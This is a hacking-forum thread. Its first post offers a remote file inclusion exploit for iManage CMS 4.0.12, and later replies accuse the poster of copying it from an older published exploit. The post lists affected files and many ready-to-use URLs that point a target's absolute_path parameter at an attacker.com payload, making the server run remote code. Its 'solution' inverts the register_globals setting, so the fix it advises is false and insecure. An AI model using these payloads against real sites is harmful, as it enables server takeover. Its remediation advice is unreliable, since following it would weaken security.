Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 05-26-2013, 07:50 AM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Hacking › Exploit v
« Previous 1 ... 8 9 10 11 12 ... 15 Next »

[Tutor] (absolute_path) Remote File Inclusion

Home General Computer Multimedia Business Lounge

Pages (2): 1 2 Next »
Post Reply 
Tweet
Threaded Mode | Linear Mode
[Tutor] (absolute_path) Remote File Inclusion
01-03-2011, 12:15 AM
Post: #1
Liyan oz Away
@riestiyansyah
Posts: 516
Joined: Dec 2010
Reputation: 12
Bug [Tutor] (absolute_path) Remote File Inclusion
Ini mainannya om..
---------------------------------------------------------------------------------------------------
(absolute_path) Remote File Inclusion
---------------------------------------------------------------------------------------------------

Author : Liyan oz a.k.a Rizky Ariestiyansyah
Date Found : January, 2nd 2011
Location : Indonesia, Jakarta
web : http://o2nri2.clan.su/ $ http://o2nri2.blogspot.com
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
iManage CMS from Imaginex-Resource

Application : iManage CMS
version : 4.0.12 stable
URL : http://www.imaginex-resource.com

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~

-----------------------component.php----------------------
....
<?php
/**
* iManage Version 4.0.12
* Dynamic portal server and Content managment engine
* 03-02-2003
*
* Copyright © 2000 - 2003 Imaginex-Resource
*
* Site Name: iManage Version 4.0.12
* File Name: rightComponent.php
* Date: 31/01/2003
* Version #: 4.0.12
* Comments: Display all modules which are to be displayed on the right.
**/

include($absolute_path.'/language/'.$lang.'/lang_components.php');
...
----------------------------------------------------------

Input passed to the "absolute_path" parameter in component.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources

Affected files:

articles.php
contact.php
displaypage.php
faq.php
mainbody.php
news.php
registration.php
whosOnline.php
components/com_calendar.php
components/com_forum.php
components/minibb/index.php
components/minibb/bb_admin.php
components/minibb/bb_plugins.php
modules/mod_calendar.php
modules/mod_browser_prefs.php
modules/mod_counter.php
modules/mod_online.php
modules/mod_stats.php
modules/mod_weather.php
themes/bizz.php
themes/default.php
themes/simple.php
themes/original.php
themes/portal.php
themes/purple.php

and more :)

Successful exploitation requires that "register_globals= Off ".

Proof Of Concept:
~~~~~~~~~~~~~

http://target.com/[path]/articles.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/contact.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/displaypage.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/faq.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/mainbody.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/news.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/registration.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/whosOnline.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/components/com_calendar.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/components/com_forum.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/components/minibb/index.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/modules/mod_calendar.php?absolute_path=http://attacker.com//inject.txt?

and more Affected files


Solution:
~~~~~
- Change register_globals= On
in php.ini
- Sanitize variable $absolute_path on affected files.

---------------------------------------------------------------------------
greetz :
El n4cko , Aaezha , Junia astri damayanti , olanuxer , ramiaji , sirracedin irri , Antitos ,
Indonesian coder Team | Cyber-warrior | Cybercode
| PHL | all DC member
------------------------------------------------------------------------
---
Contact:
~~

ariestiyansyah#rizky389[at]gmail[dot]com

----------[ oz family ]-------------
Visit this user's website Find all posts by this user
Quote this message in a reply
01-03-2011, 12:55 AM
Post: #2
Revres Tanur Offline
Adminitraktor
Posts: 661
Joined: Mar 2010
Reputation: 20
RE: [Tutor] (absolute_path) Remote File Inclusion
mantaps om... para pemburu bugs indonesia... top abiess...
Find all posts by this user
Quote this message in a reply
01-03-2011, 06:19 AM
Post: #3
Liyan oz Away
@riestiyansyah
Posts: 516
Joined: Dec 2010
Reputation: 12
RE: [Tutor] (absolute_path) Remote File Inclusion
Kita buru juga exploit asing,,ok
Visit this user's website Find all posts by this user
Quote this message in a reply
01-06-2011, 10:23 PM
Post: #4
n0wn Offline
./Devilz Advisor
Posts: 583
Joined: Dec 2010
Reputation: 9
RE: [Tutor] (absolute_path) Remote File Inclusion
mantab tuch,,,,
testeing dulu,,,
Visit this user's website Find all posts by this user
Quote this message in a reply
01-13-2011, 09:14 AM
Post: #5
wenkhairu Offline
Administrator
*******
Administrators
Posts: 1,344
Joined: Dec 2009
Reputation: 260
RE: [Tutor] (absolute_path) Remote File Inclusion
keknya pernah liat yang sejenis ini di tahun 2006, om bukan copas-copas hasil orang laen kan om ?
Code:
http://www.exploit-db.com/exploits/2046/
Visit this user's website Find all posts by this user
Quote this message in a reply
01-13-2011, 12:03 PM (This post was last modified: 01-13-2011 12:06 PM by ketek.)
Post: #6
ketek Offline
bocah ingusan
*******
Administrators
Posts: 2,180
Joined: Jan 2010
Reputation: 384
RE: [Tutor] (absolute_path) Remote File Inclusion
(01-13-2011 09:14 AM)wenkhairu Wrote:  keknya pernah liat yang sejenis ini di tahun 2006, om bukan copas-copas hasil orang laen kan om ?
Code:
http://www.exploit-db.com/exploits/2046/

waduh liyan

ngeri ah kamu..
belajar menghargai hasil kerja orang lain liyan...
Find all posts by this user
Quote this message in a reply
01-16-2011, 11:13 AM
Post: #7
h1t4k3 Offline
./Devilz Officer
Posts: 90
Joined: Aug 2010
Reputation: 2
RE: [Tutor] (absolute_path) Remote File Inclusion
Wew...copasan toh bro...
Visit this user's website Find all posts by this user
Quote this message in a reply
01-16-2011, 12:26 PM
Post: #8
jurank_dankkal Away
./Devilz Advisor
Posts: 539
Joined: Dec 2009
Reputation: 32
RE: [Tutor] (absolute_path) Remote File Inclusion
wah parah copas trs ganti nama author asli.... dead
gk bole gt bro, keep low profile klu mw keliatan tinggi d'mata orang lain...
CMIWW
Visit this user's website Find all posts by this user
Quote this message in a reply
01-18-2011, 07:28 AM
Post: #9
Sudden_death Away
0r4ng 94nt3ng
Posts: 412
Joined: Feb 2010
Reputation: 7
RE: [Tutor] (absolute_path) Remote File Inclusion
serem
Visit this user's website Find all posts by this user
Quote this message in a reply
01-18-2011, 08:39 AM
Post: #10
numlock Offline
dibanned ama admin ganteng petimati
Posts: 297
Joined: May 2010
Reputation: 23
RE: [Tutor] (absolute_path) Remote File Inclusion
wow ow kamu ketahuan.....
Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Pages (2): 1 2 Next »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
Bug [Tutor] Com_kunena Upload file ohara_inamiji 12 551 Today 07:41 AM
Last Post: Crabboy
  Remote Stack Overflow Exploitation Tutorial - Exploiting Minalic Web Server 2 on x86 cr0security 0 83 05-05-2013 08:09 AM
Last Post: cr0security
  Bypassing ASLR During Remote Stack Overflow Exploitation on Linux - Method 1 cr0security 0 60 04-07-2013 11:26 AM
Last Post: cr0security
Thumbs Up [Tutor] POC + Exploit Wordpress ~ Video Blogging Arbitrary File Upload Regel 11 675 02-02-2013 12:19 AM
Last Post: copaker21
  #DiyWeb Admin Bypass dan Remote file/shell Upload exploit AnonymousOpsID 4 337 11-06-2012 05:07 PM
Last Post: rock_me
Star [Share] Remote PHP Shell Upload Vulnurabillity brianfahmi 9 349 10-27-2012 09:31 AM
Last Post: mariachi
Bug CMS Schoolhos - Remote Arbitrary File Upload nuxbie_cyber 10 347 06-28-2012 06:47 PM
Last Post: Loex
  KasKus File Upload Vulnerability ? rusuh 24 1,046 04-13-2012 05:23 PM
Last Post: KING_cobra
  Remote Apache Denial of Service Exploit ev1lut10n 3 329 03-13-2012 11:01 PM
Last Post: Danzel
Thumbs Up [Tutor] install metasploit sekaligus tutor meterpreter :D badwolves1986 18 435 02-26-2012 09:34 AM
Last Post: gandeso

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 05-26-2013, 07:50 AM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE